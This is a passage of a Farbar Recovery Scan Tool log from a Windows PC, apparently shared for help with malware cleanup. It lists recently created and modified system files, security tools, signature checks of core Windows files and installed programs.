2014-10-24 00:03 - 2014-10-24 00:03 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-23 23:56 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-10-23 23:56 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2014-10-23 23:56 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2014-10-23 23:56 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2014-10-23 23:55 - 2014-10-23 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-23 09:02 - 2014-10-23 09:02 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-20 22:25 - 2014-10-25 01:11 - 00000000 ____D () C:\Qoobox
2014-10-20 22:25 - 2014-10-21 00:13 - 00000000 ____D () C:\Windows\erdnt
2014-10-20 22:25 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-20 22:25 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-20 22:25 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-20 21:51 - 2014-10-25 00:10 - 00000000 ____D () C:\AdwCleaner
2014-10-19 13:52 - 2014-10-25 02:06 - 00000000 ____D () C:\Windows\pss
2014-10-19 12:12 - 2014-10-27 01:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 12:11 - 2014-10-20 21:28 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-19 12:11 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-19 01:46 - 2014-10-20 21:50 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-19 01:07 - 2014-10-19 01:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-10-18 23:12 - 2014-10-18 23:12 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\WinPatrol
2014-10-16 09:12 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 09:12 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 09:11 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 09:11 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 09:11 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 09:11 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 09:11 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 09:11 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 09:11 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 09:11 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 12:50 - 2014-10-27 01:55 - 01076961 _____ () C:\Windows\WindowsUpdate.log
2014-10-04 13:45 - 2014-10-23 11:58 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\Program Files\CDisplayEx
2014-10-04 11:38 - 2014-10-21 15:24 - 00000000 ____D () C:\Users\McLain\Documents\ebay2
2014-10-04 02:13 - 2014-10-04 03:31 - 00000000 ____D () C:\Users\McLain\Documents\characters
2014-10-01 12:22 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 12:22 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-27 01:58 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 01:58 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 01:50 - 2011-07-09 00:30 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-27 01:50 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-27 01:33 - 2013-05-08 21:49 - 00000000 ____D () C:\Program Files (x86)\Mp3tag
2014-10-27 01:33 - 2011-07-09 00:30 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-27 01:26 - 2012-12-02 19:52 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 01:21 - 2011-07-09 00:30 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-27 01:01 - 2013-05-16 12:57 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-27 01:01 - 2012-06-05 15:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\vlc
2014-10-27 00:57 - 2011-07-09 00:30 - 00000000 ____D () C:\Users\McLain\AppData\Local\Google
2014-10-27 00:56 - 2014-02-02 23:42 - 00000000 ____D () C:\Program Files (x86)\RegSeeker
2014-10-27 00:55 - 2014-01-15 18:09 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-27 00:51 - 2014-07-29 00:04 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\uTorrent
2014-10-26 15:12 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-25 01:10 - 2009-07-13 19:34 - 00000215 _____ () C:\Windows\system.ini
2014-10-25 00:16 - 2011-05-19 23:30 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 01:12 - 2009-08-05 11:14 - 00000000 ____D () C:\Windows\Panther
2014-10-24 00:11 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-24 00:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-23 23:43 - 2013-07-18 21:16 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-23 23:43 - 2009-07-13 21:45 - 04889728 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-23 23:33 - 2011-06-10 22:20 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Skype
2014-10-23 09:59 - 2011-05-15 21:15 - 00059824 _____ () C:\Users\McLain\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 00:14 - 2009-07-13 20:20 - 00000000 __RHD () C:\Users\Default
2014-10-20 22:02 - 2011-05-15 21:11 - 00000000 ____D () C:\Users\McLain
2014-10-20 17:38 - 2009-07-13 22:13 - 00782228 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 01:17 - 2014-07-10 12:03 - 00000000 ____D () C:\Users\McLain\AppData\Local\Adobe
2014-10-20 01:15 - 2012-12-02 19:52 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-10-20 01:15 - 2012-10-11 10:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-10-20 01:15 - 2011-05-16 07:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-19 01:33 - 2011-07-12 23:13 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Amazon
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\Program Files (x86)\Amazon
2014-10-18 23:36 - 2012-07-29 02:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe
2014-10-18 23:36 - 2010-11-02 09:57 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-10-18 23:35 - 2012-08-23 23:00 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-18 23:35 - 2010-11-02 09:57 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-18 23:34 - 2011-05-15 21:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Adobe
2014-10-18 23:32 - 2014-04-19 00:43 - 00000000 ____D () C:\Program Files (x86)\AbiWord
2014-10-18 10:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 20:16 - 2011-07-09 00:30 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 20:16 - 2011-07-09 00:30 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 03:11 - 2014-05-28 03:22 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 03:00 - 2011-06-25 19:14 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-14 00:53 - 2011-05-16 07:10 - 00000389 _____ () C:\Windows\Brownie.ini
2014-10-02 15:53 - 2011-08-28 11:00 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\McLain\AppData\Local\Temp\Quarantine.exe
C:\Users\McLain\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 15:03

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014
Ran by McLain at 2014-10-27 02:06:07
Running from C:\Users\McLain\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 1.2.0 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AGEIA PhysX v6.10.25 (HKLM-x32\...\{7104189A-C592-4A56-AC9E-7C0CA135DA3C}) (Version: 6.10.25 - AGEIA Technologies, Inc.)
AI Manager (HKLM-x32\...\{4AF95DE2-B54D-4C3F-9494-FD3B558E2C2D}) (Version: 1.08.07 - ASUSTeK)
AMD USB Filter Driver (x32 Version: 1.0.15.94 - Advanced Micro Devices, Inc.) Hidden
ASUS Backup Wizard (HKLM-x32\...\{124C9BD0-8C52-40AB-8238-0605703B1C28}) (Version: 1.00.09 - ASUSTeK Computer Inc.)
ASUS PCE-N10 WLAN Card Utilities & Driver (HKLM-x32\...\{556BEFE2-30FF-4113-98F4-01234396DF2B}) (Version: 1.0.0.9 - )
ASUS PCE-N53 WLAN Card Utilities & Driver (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 1.0.0.8 - ASUS)
ASUS VIBE (HKLM-x32\...\ASUS VIBE) (Version: 1.0.188 - Ecareme, Inc.)
ASUSUpdate (HKLM-x32\...\{587178E7-B1DF-494E-9838-FA4DD36E873C}) (Version: 7.18.03 - ASUSTeK Computer Inc.)
ATI Catalyst Install Manager (HKLM\...\{0C798FBB-2BA6-D113-C055-936965550F33}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Best Buy pc app (Version: 3.1.1.0 - Best Buy) Hidden
Best Buy pc app (x32 Version: 3.1.1.0 - Best Buy) Hidden
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Brother HL-2040 (HKLM-x32\...\{03F595F6-B733-4A29-86BC-7C055D977D7C}) (Version: 1.00 - Brother)
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DjVuLibre DjView 3.5.25.4+4.9.2 (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.25.4+4.9.2 - DjVuZone)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
LogixPro-500 PLC Simulator (HKLM-x32\...\LogixPro 500 PLC Simulator_is1) (Version: - TheLearningPit)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 33.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RangeMax Wireless-N USB Adapter WN111v2 (HKLM-x32\...\InstallShield_{1C0E9C6B-D4D5-4D3C-8A10-F10A3E7BEEA5}) (Version: 3.0.0.3 - NETGEAR)
Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version: - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Sansa Updater (HKCU\...\Sansa Updater) (Version: 1.407 - SanDisk Corporation)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WN111v2 (x32 Version: 3.0.0.3 - NETGEAR) Hidden
Ys Origin (HKLM-x32\...\Steam App 207350) (Version: - Nihon Falcom)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

